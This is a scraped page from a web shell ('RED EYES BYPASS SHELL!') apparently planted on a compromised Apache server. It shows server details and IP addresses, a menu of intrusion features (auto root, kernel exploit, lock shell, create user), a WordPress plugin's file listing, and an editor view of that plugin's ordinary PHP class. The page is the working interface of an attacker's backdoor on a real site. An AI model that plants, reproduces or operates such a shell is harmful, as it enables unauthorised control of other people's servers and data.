Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
plugins /
complianz-gdpr /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
DNSMPD
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
cookie
[ DIR ]
drwxr-xr-x
cookiebanner
[ DIR ]
drwxr-xr-x
cron
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
gutenberg
[ DIR ]
drwxr-xr-x
integrations
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
onboarding
[ DIR ]
drwxr-xr-x
placeholders
[ DIR ]
drwxr-xr-x
progress
[ DIR ]
drwxr-xr-x
proof-of-consent
[ DIR ]
drwxr-xr-x
rest-api
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
websitescan
[ DIR ]
drwxr-xr-x
LICENSE.txt
17.98
KB
-rwxr-xr-x
README.md
2.17
KB
-rwxr-xr-x
class-admin.php
17.3
KB
-rwxr-xr-x
class-company.php
3.51
KB
-rwxr-xr-x
class-cookie-blocker.php
33.24
KB
-rwxr-xr-x
class-document.php
90.92
KB
-rwxr-xr-x
class-export.php
1.49
KB
-rwxr-xr-x
class-field.php
117.26
KB
-rwxr-xr-x
class-installer.php
3.97
KB
-rwxr-xr-x
class-review.php
5.56
KB
-rwxr-xr-x
class-wizard.php
37.1
KB
-rwxr-xr-x
complianz-gpdr.php
14.41
KB
-rwxr-xr-x
composer.json
712
B
-rwxr-xr-x
functions-legacy.php
175
B
-rwxr-xr-x
functions.php
78.58
KB
-rwxr-xr-x
gulpfile.js
4.36
KB
-rwxr-xr-x
index.php
28
B
-rwxr-xr-x
loco.xml
374
B
-rwxr-xr-x
readme.txt
29.4
KB
-rwxr-xr-x
security.md
686
B
-rwxr-xr-x
system-status.php
4.75
KB
-rwxr-xr-x
uninstall.php
6.76
KB
-rwxr-xr-x
upgrade.php
34.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-company.php
<?php defined( 'ABSPATH' ) or die( "you do not have access to this page!" ); if ( ! class_exists( "cmplz_company" ) ) { class cmplz_company { private static $_this; function __construct() { if ( isset( self::$_this ) ) { wp_die( sprintf( '%s is a singleton class and you cannot create a second instance.', get_class( $this ) ) ); } self::$_this = $this; } static function this() { return self::$_this; } /** * Get the default region based on region settings * - if we have one region selected, return this * - if we have more than one, try to get the one this company is based in * - if nothing found, return company region * * @return string region */ public function get_default_region() { //check default region $company_region_code = $this->get_company_region_code(); $regions = cmplz_get_regions(); $region = false; if ( is_array( $regions ) ) { $multiple_regions = count( $regions ) > 1; foreach ( $regions as $region_code ) { //if we have one region, just return the first result if ( ! $multiple_regions ) { return $region_code; } //if we have several regions, get the one this company is located in if ( $company_region_code === $region_code ) { $region = $region_code; } } } //fallback one: company location if ( ! $region && is_array( $regions ) ) { reset( $regions ); $region = key( $regions ); } //fallback two: company location if ( ! $region && ! empty( $company_region_code ) ) { $region = $company_region_code; } //fallback if no array was returned. if ( ! $region ) { $region = CMPLZ_DEFAULT_REGION; } return $region; } /** * Get the default consenttype based on region settings * * @return string consenttype */ public function get_default_consenttype() { //check default region $region = $this->get_default_region(); $selected_regions = cmplz_get_regions(); if (!empty($selected_regions) && !in_array( $region, $selected_regions, true )) { //get the first value in the array if it exists $region = $selected_regions[0] ?? 'eu'; } return apply_filters('cmplz_default_consenttype', cmplz_get_consenttype_for_region( $region )); } /** * Get the company region code. The EU is a region, as is the US * * @return string region_code * * */ public function get_company_region_code() { $country_code = cmplz_get_option( 'country_company' ); $countries = COMPLIANZ::$config->countries; if ( !isset($countries[$country_code]) ) { $country_code = 'US'; } $region = cmplz_get_region_for_country( $country_code ); if ( $region ) { return $region; } return CMPLZ_DEFAULT_REGION; } /** * Check if data was sold in the past 12 months * * @return bool */ public function sold_data_12months() { if ( ! cmplz_sells_personal_data() ) { return false; } $cats = cmplz_get_option( 'data_sold_us' ); if ( ! empty( $cats ) ) { foreach ( $cats as $cat => $value ) { if ( $value == 1 ) { return true; } } } return false; } /** * Check if data has been disclosed in the past 12 months * * @return bool * */ public function disclosed_data_12months() { $cats = cmplz_get_option( 'data_disclosed_us' ); if ( ! empty( $cats ) ) { foreach ( $cats as $cat => $value ) { if ( $value == 1 ) { return true; } } } return false; } } } //class closure
Close